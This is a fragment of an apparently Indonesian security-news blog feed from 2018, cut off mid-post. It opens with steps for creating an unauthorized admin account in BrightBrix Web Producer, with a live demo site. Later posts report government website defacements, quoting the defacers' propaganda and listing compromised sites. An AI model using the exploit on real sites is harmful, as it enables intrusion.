&amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;/user_admin/login_page.php?return_url=%2Fxampp%2Flang.php%3Fen&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;If vuln then you will find a form to create a new account&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;and fill in the active e-mail, and check your e-mail for activation of the code and creat ur password, if it is then it will go directly to the dashboard page.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Proof : &amp;gt; https://image.ibb.co/jCa2je/Pwnd.png&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Demo : https://www.brightbrix.com/user_admin/login_page.php?return_url=%2Fxampp%2Flang.php%3Fen&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;===========================================&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Contact Me&amp;nbsp; :&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;https://www.facebook.com/darkvenom.gov&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;zaenalarifin.net@gmail.com&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;===========================================&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;=====================================================================&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Special Thanks to : Familly Team_CC | AnonGhost | MilWorm | TeaMp0is0N | Fallaga Team&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;=====================================================================&lt;/span&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://feeds.feedburner.com/bandungdigitalsecurity&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='https://www.bandungdigitalsecurity.org/feeds/7689192503883787519/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/09/brightbrix-web-producer-extending.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/7689192503883787519'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/7689192503883787519'/><link rel='alternate' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/09/brightbrix-web-producer-extending.html' title='BRIGHTBRIX® Web Producer - Extending the Internet Add Admin Vulnerability'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://4.bp.blogspot.com/-sx9_5sHDmdE/W5Cv0wpSXiI/AAAAAAAAAME/v_Y3FGpUGc8VV81RcVCOcPI3Y8ZD5v6sQCLcBGAs/s72-c/Brighbrix.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1481717144980864440.post-6103513298318029913</id><published>2018-08-25T06:14:00.001-07:00</published><updated>2018-08-25T06:14:36.037-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Attack"/><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Crime"/><category scheme="http://www.blogger.com/atom/ns#" term="Government"/><category scheme="http://www.blogger.com/atom/ns#" term="Internet"/><category scheme="http://www.blogger.com/atom/ns#" term="News"/><category scheme="http://www.blogger.com/atom/ns#" term="Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Technology"/><title type='text'>AnonGhost Hacked Afghanistan Military Website</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://4.bp.blogspot.com/-bt8KiUg-KNc/W4FUO2u5N3I/AAAAAAAAAL4/zML97Qv33s4SLItsxi-MyoXcK3Y2A5LBQCLcBGAs/s1600/Afganistan%2BMilitary%2BHacked.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;835&quot; data-original-width=&quot;1439&quot; height=&quot;370&quot; src=&quot;https://4.bp.blogspot.com/-bt8KiUg-KNc/W4FUO2u5N3I/AAAAAAAAAL4/zML97Qv33s4SLItsxi-MyoXcK3Y2A5LBQCLcBGAs/s640/Afganistan%2BMilitary%2BHacked.png&quot; width=&quot;640&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;And it happened again The official website of the Afghanistan Military hacked by AnonGhost, was apparently being hacked by hackers.&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;when our party opened a website that addressed&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;http://www.airman.af.mil&lt;/span&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&amp;nbsp;&amp;nbsp;the appearance of Black with the Islamic Images and read &quot;&lt;b&gt;US army + Israeli Army = Children Killers&lt;/b&gt;&quot;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;and include a message :&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;b&gt;This Message Is Addressed To the United States Government :&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;b&gt;you have failed as expected.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;b&gt;for long time,we have witnessed your unjust laws.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;b&gt;you have abused human rights, killed thousands of innocents ,&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;b&gt;supported Israel to kill innocent Palestinians in Gaza strip.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;b&gt;bombings houses and mosques,arresting and killing innocent people in Iraq &amp;amp; Afghanistan&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;b&gt;using media propaganda to justify your lies and your corrupt act...&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;b&gt;now it&#39;s our turn to react&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;b&gt;because we are the voice of muslims everywhere.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;b&gt;We are AnonGhost, We are Legion, United as ONE, Divided by ZERO.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;b&gt;We do not forgive Injustice.We do not forget Oppression.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;b&gt;US Government&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;b&gt;&quot;We are AnonGhost, We are legion, We do not forgive, We do not forget, Expect us.&quot;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;b&gt;you have to Expect Us !&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;It is not clear whether the website administrator who handles the website has known about this cyber attack. Because until now, the deface display can still be found.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Who does not know the name AnonGhost in its time in 2012-2014 the team is a team that shocked the part of the world where this hacker is a jihad cyber hacking tens of thousands of websites in a few days.&amp;nbsp;after a long time not appearing this time AnonGhost returned and hacked the Afghan Military Site.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Until this news has been posted, there has been no response from the website manager, and still save the file named owned.html, we can see the display in the following archive:&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;http://www.zone-h.org/mirror/id/31589934&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;or can directly see at the address:&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;http://www.airman.af.mil/&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;http://www.pdg.af.mil/index.php&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;(Zaenal Arifin)&lt;/span&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://feeds.feedburner.com/bandungdigitalsecurity&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='https://www.bandungdigitalsecurity.org/feeds/6103513298318029913/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/08/anonghost-hacked-afghanistan-military.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/6103513298318029913'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/6103513298318029913'/><link rel='alternate' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/08/anonghost-hacked-afghanistan-military.html' title='AnonGhost Hacked Afghanistan Military Website'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://4.bp.blogspot.com/-bt8KiUg-KNc/W4FUO2u5N3I/AAAAAAAAAL4/zML97Qv33s4SLItsxi-MyoXcK3Y2A5LBQCLcBGAs/s72-c/Afganistan%2BMilitary%2BHacked.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1481717144980864440.post-3619419737623144751</id><published>2018-08-22T18:47:00.000-07:00</published><updated>2018-08-22T18:53:02.479-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Attack"/><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Crime"/><category scheme="http://www.blogger.com/atom/ns#" term="Exploit"/><category scheme="http://www.blogger.com/atom/ns#" term="Malware"/><category scheme="http://www.blogger.com/atom/ns#" term="News"/><category scheme="http://www.blogger.com/atom/ns#" term="Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Technology"/><title type='text'>Situs Biro Hukum Departemen Kementrian Kesehatan Diretas</title><content type='html'>&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Baru-baru ini situs Biro Hukum Departemen Kementrian Kesehatan Diretas, pada tanggal 23 Agustus 2018 saat diakses website Biro Hukum Kementrian Kesehatan yang beralamat pada&amp;nbsp;http://hukor.kemkes.go.id/&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;tampilan berubah menjadi Background Merah Putih dan terpampang sebuah Gambar&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Meme&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&amp;nbsp;Para Narapidana Korupsi dan Bertuliskan &quot;&lt;/span&gt;&lt;b style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;SEBANGSAT APAPUN KALIAN JANGAN LUPA TETAP TERSENYUM KARENA SENYUM ADALAH IBADAH&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&quot; pada gambar tersebut berikut sekilas tampilan nya :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://2.bp.blogspot.com/-JMdYYf1xT5s/W34QQl_Bx4I/AAAAAAAAALs/-10GoHMBwGA9wT8CA8WwdDHmBy8UTYThwCLcBGAs/s1600/Kemkes%2BHacked.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;837&quot; data-original-width=&quot;1437&quot; height=&quot;372&quot; src=&quot;https://2.bp.blogspot.com/-JMdYYf1xT5s/W34QQl_Bx4I/AAAAAAAAALs/-10GoHMBwGA9wT8CA8WwdDHmBy8UTYThwCLcBGAs/s640/Kemkes%2BHacked.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;dan berisi pesan yang mengkritik pemerintah berikut Pesan yang disampaikan oleh hacker tersebut :&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&quot;&lt;/span&gt;&lt;b style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Hacked by MrMoonz ft KaizeN&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&quot;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;Di puncak pemimpin yang bebas korupsi, disitulah masa depan negri.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;/span&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;Jangan Benci Negara, Bencilah Pemerintahnya&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;Karena, Rakyat adalah Kekuatan.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;Jangan Benci Hacker, Bencilah Kodenya&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;Karena, Tidak Ada Sistem yang Aman&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;Greatz&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;Res7ock Crew | Ghost Sec-Team | Sanjungan Jiwa&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;Indonesian Hacker Rulez&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;dan mencantumkan bebrapa Codenama lain nya Berikut isi kontent yang terpampang pada halaman depan situs biro hukum kementrian kesehatan, tampaknya motif dari serangan ini memiliki arahan terhadap pemerintah yang korup.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Situs Hukor Kementrian Kesehatan ini masih berfungsi seperti semestinya dimana menampilkan informasi-informasi penting.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;berikut daftar website yang diretas :&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;http://hukor.depkes.go.id/&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;http://hukor.kemkes.go.id/&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;Setelah diluncurkan nya berita ini belum ada tanggapan serius dari pengelola website. seharusnya ini bisa menjadi perhatian penting bagi pengelola karena ini merupakan hal yang sangat fatal.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;(Zaenal Arifin)&lt;/span&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://feeds.feedburner.com/bandungdigitalsecurity&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='https://www.bandungdigitalsecurity.org/feeds/3619419737623144751/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/08/situs-biro-hukum-kementrian-kesehatan.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/3619419737623144751'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1481717144980864440/posts/default/3619419737623144751'/><link rel='alternate' type='text/html' href='https://www.bandungdigitalsecurity.org/2018/08/situs-biro-hukum-kementrian-kesehatan.html' title='Situs Biro Hukum Departemen Kementrian Kesehatan Diretas'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://2.bp.blogspot.com/-JMdYYf1xT5s/W34QQl_Bx4I/AAAAAAAAALs/-10GoHMBwGA9wT8CA8WwdDHmBy8UTYThwCLcBGAs/s72-c/Kemkes%2BHacked.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1481717144980864440.post-8318820335083561324</id><published>2018-08-20T19:52:00.001-07:00</published><updated>2018-08-20T19:52:50.055-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Attack"/><category scheme="http://www.blogger.com/atom/ns#" term="Cyber Crime"/><category scheme="http://www.blogger.com/atom/ns#" term="Deface"/><category scheme="http://www.blogger.com/atom/ns#" term="Internet"/><category scheme="http://www.blogger.com/atom/ns#" term="News"/><category scheme="http://www.blogger.com/atom/ns#" term="Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Technology"/><title type='text'>Subdomain Situs Komisi Pemberantasan Korupsi (KPK) Diretas</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://3.bp.blogspot.com/-6bcgBEHW7v8/W3t-BxDrqCI/AAAAAAAAALg/EoMRB3bEYwcPmPHopiVXDO4ISTZG_sZWACLcBGAs/s1600/KPK%2BDiretas.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;809&quot; data-original-width=&quot;1437&quot; height=&quot;360&quot; src=&quot;https://3.bp.blogspot.com/-6bcgBEHW7v8/W3t-BxDrqCI/AAAAAAAAALg/EoMRB3bEYwcPmPHopiVXDO4ISTZG_sZWACLcBGAs/s640/KPK%2BDiretas.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Baru baru ini Subdomain dari Situs Komisi Pemberantasan Korupsi alias KPK lebih tepatnya pada Subdomain e-LHKPN KPK Diretas , Peretas tidak merusak tampilan halaman depan namun merusak index dari direktori penyimpanan gambar yaitu pada bagian /images yang beralamat pada :&amp;nbsp;https://elhkpn.kpk.go.id/images/ , Saat dikunjungi Tampilan berubah menjadi Latar putih dan berisikan Sebuah Kata-kata dan sebuah gambar Kartun dimana tulisan tersebut bertuliskan :&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&quot;Hacked by MrMoonz&quot;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;[ Indonesian Hacker Rulez ]&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Laughing at your security! Security is just an illusion!&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Copyrights © Rabbit Security Team 2018&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Entah apa motif dari kasus peretasan ini Belum jelas apakah administrator website yang menangani website tersebut telah mengetahui kejadian serangan cyber ini. Karena hingga sekarang, tampilan deface tersebut masih dapat ditemui.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial, 